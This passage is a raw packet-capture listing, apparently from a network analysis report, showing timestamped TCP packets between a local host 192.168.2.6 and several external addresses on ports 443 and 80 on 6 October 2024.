                                                                                                                            Oct 6, 2024 13:50:10.683757067 CEST49782443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.683777094 CEST4434978213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.684828043 CEST49782443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.684848070 CEST4434978213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.685475111 CEST49780443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.685487986 CEST4434978013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.686167955 CEST49780443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.686172009 CEST4434978013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.686382055 CEST49781443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.686393023 CEST4434978113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.686903000 CEST49781443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.686907053 CEST4434978113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.687316895 CEST49783443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.687330961 CEST4434978313.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.687911034 CEST49783443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.687916040 CEST4434978313.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.756037951 CEST44349774142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.756145954 CEST44349774142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.756269932 CEST49774443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.756297112 CEST44349774142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.758826971 CEST44349774142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.758917093 CEST49774443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.758933067 CEST44349774142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.763526917 CEST49774443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.763638020 CEST44349774142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.764010906 CEST44349774142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.764089108 CEST49774443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.764089108 CEST49774443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.780126095 CEST4434977913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.780199051 CEST4434977913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.780299902 CEST49779443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.781414032 CEST4434978213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.781574011 CEST4434978213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.781627893 CEST49782443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.781826019 CEST49779443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.781826019 CEST49779443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.781857014 CEST4434977913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.781879902 CEST4434977913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.782263994 CEST4434978013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.782315969 CEST4434978013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.782416105 CEST49780443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.782850027 CEST4434978313.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.783000946 CEST4434978313.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.783296108 CEST49783443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.783549070 CEST4434978113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.783704996 CEST4434978113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.783754110 CEST49781443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.783993959 CEST49780443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.783993959 CEST49780443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.784003973 CEST4434978013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.784012079 CEST4434978013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.785126925 CEST49783443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.785126925 CEST49783443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.785130978 CEST4434978313.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.785136938 CEST4434978313.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.785367012 CEST49781443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.785382986 CEST4434978113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.785392046 CEST49781443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.785397053 CEST4434978113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.786772013 CEST49782443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.786776066 CEST4434978213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.800695896 CEST49788443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.800729036 CEST4434978813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.800851107 CEST49788443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.808828115 CEST49789443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.808917999 CEST4434978913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.809032917 CEST49789443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.810307980 CEST49790443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.810339928 CEST4434979013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.810482979 CEST49790443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.811120987 CEST49788443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.811140060 CEST4434978813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.813369989 CEST49789443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.813407898 CEST4434978913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.813529015 CEST49790443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.813555956 CEST4434979013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.814362049 CEST49791443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.814378977 CEST4434979113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.814615011 CEST49791443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.815680981 CEST49791443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.815690994 CEST4434979113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.817930937 CEST49792443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.817962885 CEST4434979213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.818090916 CEST49792443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.818627119 CEST49792443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.818640947 CEST4434979213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.922909975 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.922935009 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.923135996 CEST49773443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.923173904 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.925787926 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.925842047 CEST49773443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.925856113 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.932164907 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.932219028 CEST49773443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.932240963 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.932415962 CEST49773443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.932475090 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.932626009 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.932643890 CEST49773443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.932677031 CEST49773443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.034008980 CEST44349785104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.034334898 CEST49785443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:11.034358978 CEST44349785104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.034657001 CEST44349785104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.035181999 CEST49785443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:11.035248995 CEST44349785104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.035533905 CEST49785443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:11.046672106 CEST8049717165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.046735048 CEST4971780192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:11.083410978 CEST44349785104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.233194113 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.233222961 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.233253956 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.233282089 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.233278036 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.233310938 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.233339071 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.233392954 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.233447075 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.233448029 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.233448029 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.233448029 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.233484030 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.233522892 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.233527899 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.233542919 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.233573914 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.233582020 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.233597040 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.233611107 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.233639002 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:11.233692884 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.233742952 CEST44349785104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.233844042 CEST44349785104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.233886003 CEST49785443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:11.234885931 CEST49785443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:11.234909058 CEST44349785104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.238111019 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.238403082 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.238428116 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.238454103 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.238470078 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.238487005 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.238516092 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.239140034 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.239167929 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.239188910 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.239196062 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.239207029 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.239242077 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.239255905 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.239300966 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.239315987 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.239984035 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.240011930 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.240032911 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.240051031 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.240071058 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.240099907 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.240858078 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.240884066 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.240907907 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.240915060 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.240925074 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.240961075 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.240977049 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.241025925 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.241624117 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.244714975 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.244766951 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.244781971 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.250195980 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.250246048 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.250260115 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.255994081 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.256046057 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.256059885 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.261199951 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.261553049 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.261567116 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.263457060 CEST44349786184.28.90.27192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.263540983 CEST49786443192.168.2.6184.28.90.27
                                                                                                                            Oct 6, 2024 13:50:11.264935017 CEST49786443192.168.2.6184.28.90.27
                                                                                                                            Oct 6, 2024 13:50:11.264944077 CEST44349786184.28.90.27192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.265969038 CEST44349786184.28.90.27192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.266506910 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.266557932 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.266572952 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.267225981 CEST49786443192.168.2.6184.28.90.27
                                                                                                                            Oct 6, 2024 13:50:11.271965981 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.272012949 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.272028923 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.277400017 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.277426004 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.277451992 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.277467966 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.277520895 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.282828093 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.287282944 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.287313938 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.287341118 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.287358046 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.287415028 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.290613890 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.294343948 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.294372082 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.294409037 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.294445038 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.294498920 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.298026085 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.301462889 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.301526070 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.301525116 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.301548958 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.301590919 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.305054903 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.308377028 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.308403969 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.308429003 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.308449030 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.308491945 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.310847998 CEST4971780192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:11.310903072 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:11.311398983 CEST44349786184.28.90.27192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.311912060 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.315553904 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.315617085 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.315640926 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.315737009 CEST8049717165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.315758944 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.318794012 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.318830967 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.318851948 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.318873882 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.318929911 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.322350025 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.325968027 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.326000929 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.326031923 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.326051950 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.326107025 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.329415083 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.332766056 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.332823038 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.332840919 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.336498022 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.336534977 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.336540937 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.336560011 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.336610079 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.339811087 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.343338013 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.343405008 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.343416929 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.343429089 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.343487978 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.345493078 CEST49793443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:11.345526934 CEST44349793104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.345585108 CEST49793443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:11.346863985 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.352174044 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.352205992 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.352227926 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.352255106 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.352488995 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.353765011 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.357376099 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.357407093 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.357429981 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.357450008 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.357510090 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.360060930 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.363147020 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.363210917 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.363229036 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.366405964 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.366430044 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.366461039 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.366480112 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.366529942 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.369489908 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.372392893 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.372430086 CEST49793443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:11.372442007 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.372467995 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.372508049 CEST44349793104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.378093958 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.378122091 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.378143072 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.378154993 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.378194094 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.378211975 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.378344059 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.378381968 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.378388882 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.379686117 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.379729033 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.379736900 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.381613970 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.381655931 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.381663084 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.383647919 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.383699894 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:11.383708000 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:11.385675907 CEST44349777142.250.185.193192.168.2.6
